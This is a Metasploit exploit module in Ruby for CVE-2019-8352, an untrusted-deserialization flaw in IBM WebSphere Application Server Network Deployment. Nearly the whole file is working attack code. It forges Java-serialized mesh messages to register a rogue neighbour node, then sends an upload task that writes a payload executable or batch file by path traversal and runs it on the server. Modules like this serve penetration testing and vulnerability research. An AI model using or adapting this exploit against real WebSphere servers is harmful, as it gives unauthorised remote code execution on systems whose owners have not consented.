650 lines
No EOL
26 KiB
Ruby
Executable file
650 lines
No EOL
26 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::Powershell
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::FileDropper
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
|
|
'Description' => %(
|
|
This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
|
|
NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
|
|
),
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
|
|
],
|
|
'References' =>
|
|
[
|
|
['CVE', '2019-8352'],
|
|
['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
|
|
],
|
|
'Platform' => ['win'],
|
|
'Targets' =>
|
|
[
|
|
[
|
|
'Windows Binary', {
|
|
'Arch' => [ARCH_X86, ARCH_X64],
|
|
'Platform' => 'win'
|
|
}
|
|
],
|
|
[
|
|
'CMD', {
|
|
'Arch' => ARCH_CMD,
|
|
'Platform' => 'win',
|
|
'Payload' => {'Compat' => {'RequiredCmd' => 'generic'}}
|
|
}
|
|
]
|
|
],
|
|
'Privileged' => true,
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => 'May 15 2019'))
|
|
|
|
register_options(
|
|
[
|
|
Opt::RPORT(11006), # 11002,11004,11006,etc
|
|
OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
|
|
OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
|
|
OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
|
|
OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
|
|
]
|
|
)
|
|
end
|
|
|
|
def cleanup
|
|
disconnect
|
|
print_status('Disconnected from IBM Websphere DMGR.')
|
|
super
|
|
end
|
|
|
|
def exploit
|
|
command = nil
|
|
|
|
if target.name == 'CMD'
|
|
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") unless datastore['CMD']
|
|
command = datastore['CMD']
|
|
end
|
|
# Connect to IBM Websphere Application Server
|
|
connect
|
|
print_status("Connected to IBM WAS DMGR.")
|
|
|
|
node_port = datastore['RPORT']
|
|
|
|
# Send packet to add neighbor
|
|
enc_stream = construct_tcp_node_msg(node_port)
|
|
send_msg(enc_stream)
|
|
|
|
sock.get_once
|
|
print_status('Server responded')
|
|
|
|
# Generate binary name
|
|
bin_name = rand_text_alpha(8)
|
|
|
|
if command
|
|
command = datastore['CMD']
|
|
payload_contents = command.to_s
|
|
print_status('Executing command: ' + payload_contents)
|
|
bin_name << ".bat"
|
|
else
|
|
payload_contents = generate_payload_exe(code: payload.generate)
|
|
bin_name << ".exe"
|
|
end
|
|
|
|
print_status("Sending payload: #{bin_name}")
|
|
enc_stream = construct_bcast_task_msg(node_port, "..\\..\\..\\" + bin_name, payload_contents, bin_name)
|
|
send_msg(enc_stream)
|
|
register_file_for_cleanup(bin_name)
|
|
end
|
|
|
|
def send_msg(enc_stream)
|
|
pkt = [0x396fb74a].pack('N')
|
|
pkt += [enc_stream.length + 1].pack('N')
|
|
pkt += "\x00"
|
|
pkt += enc_stream
|
|
|
|
# Send msg
|
|
sock.put(pkt)
|
|
end
|
|
|
|
def construct_tcp_node_msg(node_port)
|
|
p2p_obj = Rex::Java::Serialization::Model::NewObject.new
|
|
p2p_obj.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
|
|
p2p_obj.class_desc.description = build_p2p_node_class(p2p_obj)
|
|
|
|
# Create the obj
|
|
object = Rex::Java::Serialization::Model::NewObject.new
|
|
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
|
|
object.class_desc.description = build_tcp_node_msg(object, 12, "0.0.0.0", node_port, p2p_obj)
|
|
|
|
# Create the stream and add the object
|
|
stream = Rex::Java::Serialization::Model::Stream.new
|
|
stream.contents = []
|
|
stream.contents << object
|
|
stream.contents << Rex::Java::Serialization::Model::EndBlockData.new
|
|
stream.contents << Rex::Java::Serialization::Model::NullReference.new
|
|
stream.encode
|
|
end
|
|
|
|
def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
|
|
# Add upload file argument
|
|
byte_arr = byte_str.unpack("C*")
|
|
upfile_arg_obj = build_upfile_arg_class(filename, byte_arr, cmd)
|
|
|
|
# Create the obj
|
|
object = Rex::Java::Serialization::Model::NewObject.new
|
|
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
|
|
object.class_desc.description = build_bcast_run_task_msg(object, 41, "0.0.0.0", node_port, upfile_arg_obj)
|
|
|
|
# Create the stream and add the object
|
|
stream = Rex::Java::Serialization::Model::Stream.new
|
|
stream.contents = []
|
|
stream.contents << object
|
|
stream.encode
|
|
end
|
|
|
|
def build_message(obj, msg_id, msg_type, orig_cell_field_type)
|
|
# Create the integer field and add the reference
|
|
id_field = Rex::Java::Serialization::Model::Field.new
|
|
id_field.type = 'int'
|
|
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ID')
|
|
|
|
# Create the integer field and add the reference
|
|
type_field = Rex::Java::Serialization::Model::Field.new
|
|
type_field.type = 'int'
|
|
type_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'type')
|
|
|
|
# Create the object field and add the reference
|
|
new_field = Rex::Java::Serialization::Model::Field.new
|
|
new_field.type = 'object'
|
|
new_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'originatingCell')
|
|
new_field.field_type = orig_cell_field_type
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.Message')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << id_field
|
|
msg_class_desc.fields << type_field
|
|
msg_class_desc.fields << new_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
|
|
|
|
# Set the member values
|
|
obj.class_data << ['int', msg_id]
|
|
obj.class_data << ['int', msg_type]
|
|
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
|
|
prng = Random.new
|
|
msg_id = prng.rand(4294967295)
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
|
|
|
|
msg_obj = build_message(obj, msg_id, msg_type, field_ref)
|
|
|
|
# Create the integer field and add the reference
|
|
id_field = Rex::Java::Serialization::Model::Field.new
|
|
id_field.type = 'int'
|
|
id_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceMsgID')
|
|
|
|
# Create the integer field and add the reference
|
|
port_field = Rex::Java::Serialization::Model::Field.new
|
|
port_field.type = 'int'
|
|
port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceUdpPort')
|
|
|
|
# Create the object field and add the reference
|
|
ip_arr_field = Rex::Java::Serialization::Model::Field.new
|
|
ip_arr_field.type = 'array'
|
|
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'sourceIP')
|
|
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << id_field
|
|
msg_class_desc.fields << port_field
|
|
msg_class_desc.fields << ip_arr_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = msg_obj
|
|
|
|
# Construct IP Array
|
|
ip_arr = source_ip.split(".").map(&:to_i)
|
|
builder = Rex::Java::Serialization::Builder.new
|
|
values_array = builder.new_array(
|
|
values_type: 'byte',
|
|
values: ip_arr,
|
|
name: '[B',
|
|
serial: 0x42acf317f8060854e0,
|
|
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
)
|
|
|
|
# Set the member values
|
|
obj.class_data << ['int', msg_id]
|
|
obj.class_data << ['int', source_port]
|
|
obj.class_data << values_array
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
|
|
prng = Random.new
|
|
msg_id = prng.rand(4294967295)
|
|
|
|
# Create the field type for the origCell
|
|
field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
|
|
msg_obj = build_message(obj, msg_id, msg_type, field_type)
|
|
|
|
# Create the port field and add the reference
|
|
boot_time_field = Rex::Java::Serialization::Model::Field.new
|
|
boot_time_field.type = 'long'
|
|
boot_time_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bootTime')
|
|
|
|
# Create the port field and add the reference
|
|
tcp_port_field = Rex::Java::Serialization::Model::Field.new
|
|
tcp_port_field.type = 'int'
|
|
tcp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'tcpPort')
|
|
|
|
# Create the port field and add the reference
|
|
udp_port_field = Rex::Java::Serialization::Model::Field.new
|
|
udp_port_field.type = 'int'
|
|
udp_port_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'udpPort')
|
|
|
|
# Create the object field and add the reference
|
|
ip_arr_field = Rex::Java::Serialization::Model::Field.new
|
|
ip_arr_field.type = 'array'
|
|
ip_arr_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'ip')
|
|
ip_arr_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, '[B')
|
|
|
|
# Create the task object field and add field_type
|
|
node_prop_field = Rex::Java::Serialization::Model::Field.new
|
|
node_prop_field.type = 'object'
|
|
node_prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'nodeProperty')
|
|
node_prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Lcom/ibm/son/mesh/AppLevelNodeProperty;")
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << boot_time_field
|
|
msg_class_desc.fields << tcp_port_field
|
|
msg_class_desc.fields << udp_port_field
|
|
msg_class_desc.fields << ip_arr_field
|
|
msg_class_desc.fields << node_prop_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = msg_obj
|
|
|
|
# Construct IP Array
|
|
ip_arr = source_ip.split(".").map(&:to_i)
|
|
builder = Rex::Java::Serialization::Builder.new
|
|
values_array = builder.new_array(
|
|
values_type: 'byte',
|
|
values: ip_arr,
|
|
name: '[B',
|
|
serial: 0x42acf317f8060854e0,
|
|
annotations: [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
)
|
|
|
|
# Set the member values
|
|
obj.class_data << ['long', 0]
|
|
obj.class_data << ['int', source_port]
|
|
obj.class_data << ['int', source_port]
|
|
obj.class_data << values_array
|
|
obj.class_data << p2p_obj
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_app_node_class(obj)
|
|
# Create the structured gateway field and add the reference
|
|
struct_bool_field = Rex::Java::Serialization::Model::Field.new
|
|
struct_bool_field.type = 'boolean'
|
|
struct_bool_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'structuredGateway')
|
|
|
|
# Create the version field and add the reference
|
|
version_field = Rex::Java::Serialization::Model::Field.new
|
|
version_field.type = 'int'
|
|
version_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'version')
|
|
|
|
# Create the object field and add the reference
|
|
bridge_field = Rex::Java::Serialization::Model::Field.new
|
|
bridge_field.type = 'object'
|
|
bridge_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'bridgedCellsList')
|
|
bridge_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/List;')
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
|
|
|
|
# Create the cellname field and add the reference
|
|
cellname_field = Rex::Java::Serialization::Model::Field.new
|
|
cellname_field.type = 'object'
|
|
cellname_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'cellName')
|
|
cellname_field.field_type = field_ref
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << struct_bool_field
|
|
msg_class_desc.fields << version_field
|
|
msg_class_desc.fields << bridge_field
|
|
msg_class_desc.fields << cellname_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
|
|
|
|
# Set the member values
|
|
obj.class_data << ['boolean', 0]
|
|
obj.class_data << ['int', 0]
|
|
obj.class_data << Rex::Java::Serialization::Model::NullReference.new
|
|
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_hashtable_class(obj)
|
|
# Create the integer field and add the reference
|
|
load_field = Rex::Java::Serialization::Model::Field.new
|
|
load_field.type = 'float'
|
|
load_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'loadFactor')
|
|
|
|
# Create the integer field and add the reference
|
|
threshold_field = Rex::Java::Serialization::Model::Field.new
|
|
threshold_field.type = 'int'
|
|
threshold_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'threshold')
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Hashtable')
|
|
msg_class_desc.serial_version = 0x13BB0F25214AE4B8
|
|
msg_class_desc.flags = 3
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << load_field
|
|
msg_class_desc.fields << threshold_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
|
|
|
|
obj.class_data << ['float', 0.75]
|
|
obj.class_data << ['int', 8]
|
|
obj.class_data << Rex::Java::Serialization::Model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_properties_class
|
|
# Create the object
|
|
object = Rex::Java::Serialization::Model::NewObject.new
|
|
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
|
|
|
|
msg_obj = build_hashtable_class(object)
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9
|
|
|
|
# Create the integer field and add the reference
|
|
defaults_field = Rex::Java::Serialization::Model::Field.new
|
|
defaults_field.type = 'object'
|
|
defaults_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'defaults')
|
|
defaults_field.field_type = field_ref
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'java.util.Properties')
|
|
msg_class_desc.serial_version = 0x3912D07A70363E98
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << defaults_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = msg_obj
|
|
|
|
# Set the member values
|
|
object.class_desc.description = msg_class_desc
|
|
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'memberName')
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'inOdc')
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, '0')
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'epoch')
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)
|
|
|
|
object
|
|
end
|
|
|
|
def build_p2p_node_class(obj)
|
|
msg_obj = build_app_node_class(obj)
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
|
|
|
|
# Create the data field and add the reference
|
|
data_field = Rex::Java::Serialization::Model::Field.new
|
|
data_field.type = 'array'
|
|
data_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'data')
|
|
data_field.field_type = field_ref
|
|
|
|
# Create the object field and add the reference
|
|
prop_field = Rex::Java::Serialization::Model::Field.new
|
|
prop_field.type = 'object'
|
|
prop_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'properties')
|
|
prop_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, 'Ljava/util/Properties;')
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
|
|
msg_class_desc.serial_version = 2
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << data_field
|
|
msg_class_desc.fields << prop_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = msg_obj
|
|
|
|
# Create the byte array ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6
|
|
|
|
# Construct IP Array
|
|
byte_array = Rex::Java::Serialization::Model::NewArray.new
|
|
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
|
|
byte_array.array_description.description = field_ref
|
|
byte_array.type = "byte"
|
|
byte_array.values = []
|
|
|
|
# Set the member values
|
|
obj.class_data << byte_array
|
|
|
|
# Add properties
|
|
obj.class_data << build_properties_class
|
|
|
|
msg_class_desc
|
|
end
|
|
|
|
def build_upfile_arg_class(filename, bytes, cmd)
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
|
|
|
|
# Create the integer field and add the reference
|
|
filename_field = Rex::Java::Serialization::Model::Field.new
|
|
filename_field.type = 'object'
|
|
filename_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileName')
|
|
filename_field.field_type = field_ref
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4
|
|
|
|
# Create the integer field and add the reference
|
|
filebody_field = Rex::Java::Serialization::Model::Field.new
|
|
filebody_field.type = 'array'
|
|
filebody_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'fileBody')
|
|
filebody_field.field_type = field_ref
|
|
|
|
# Create the field ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1
|
|
|
|
# Create the object field and add the reference
|
|
post_cmd_field = Rex::Java::Serialization::Model::Field.new
|
|
post_cmd_field.type = 'object'
|
|
post_cmd_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'postProcCmd')
|
|
post_cmd_field.field_type = field_ref
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << filebody_field
|
|
msg_class_desc.fields << filename_field
|
|
msg_class_desc.fields << post_cmd_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = Rex::Java::Serialization::Model::NullReference.new
|
|
|
|
# Create the byte array ref
|
|
field_ref = Rex::Java::Serialization::Model::Reference.new
|
|
field_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 7
|
|
|
|
# Construct IP Array
|
|
byte_array = Rex::Java::Serialization::Model::NewArray.new
|
|
byte_array.array_description = Rex::Java::Serialization::Model::ClassDesc.new
|
|
byte_array.array_description.description = field_ref
|
|
byte_array.type = "byte"
|
|
byte_array.values = bytes
|
|
|
|
# Set the member values
|
|
object = Rex::Java::Serialization::Model::NewObject.new
|
|
object.class_desc = Rex::Java::Serialization::Model::ClassDesc.new
|
|
object.class_desc.description = msg_class_desc
|
|
object.class_data << byte_array
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, filename)
|
|
object.class_data << Rex::Java::Serialization::Model::Utf.new(nil, cmd)
|
|
|
|
object
|
|
end
|
|
|
|
def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
|
|
msg_obj = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
|
|
|
|
# Create the integer field and add the reference
|
|
out_int_field = Rex::Java::Serialization::Model::Field.new
|
|
out_int_field.type = 'int'
|
|
out_int_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'outputGatherInterval')
|
|
|
|
# Create the task object field and add field_type
|
|
task_field = Rex::Java::Serialization::Model::Field.new
|
|
task_field.type = 'object'
|
|
task_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'task')
|
|
task_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/lang/String;")
|
|
|
|
# Create the task object field and add field_type
|
|
task_arg_field = Rex::Java::Serialization::Model::Field.new
|
|
task_arg_field.type = 'object'
|
|
task_arg_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'taskArgument')
|
|
task_arg_field.field_type = Rex::Java::Serialization::Model::Utf.new(nil, "Ljava/io/Serializable;")
|
|
|
|
# Create the integer field and add the reference
|
|
forward_gather_field = Rex::Java::Serialization::Model::Field.new
|
|
forward_gather_field.type = 'int'
|
|
forward_gather_field.name = Rex::Java::Serialization::Model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
|
|
|
|
# Create the class description
|
|
msg_class_desc = Rex::Java::Serialization::Model::NewClassDesc.new
|
|
msg_class_desc.class_name = Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
|
|
msg_class_desc.serial_version = 1
|
|
msg_class_desc.flags = 2
|
|
msg_class_desc.fields = []
|
|
msg_class_desc.fields << forward_gather_field
|
|
msg_class_desc.fields << out_int_field
|
|
msg_class_desc.fields << task_field
|
|
msg_class_desc.fields << task_arg_field
|
|
|
|
# Add annotations
|
|
msg_class_desc.class_annotation = Rex::Java::Serialization::Model::Annotation.new
|
|
msg_class_desc.class_annotation.contents = [Rex::Java::Serialization::Model::EndBlockData.new]
|
|
|
|
# Add superclass
|
|
msg_class_desc.super_class = Rex::Java::Serialization::Model::ClassDesc.new
|
|
msg_class_desc.super_class.description = msg_obj
|
|
|
|
# Set the member values
|
|
obj.class_data << ['int', 0]
|
|
obj.class_data << ['int', 1]
|
|
obj.class_data << Rex::Java::Serialization::Model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
|
|
obj.class_data << upfile_arg_obj
|
|
|
|
msg_class_desc
|
|
end
|
|
end |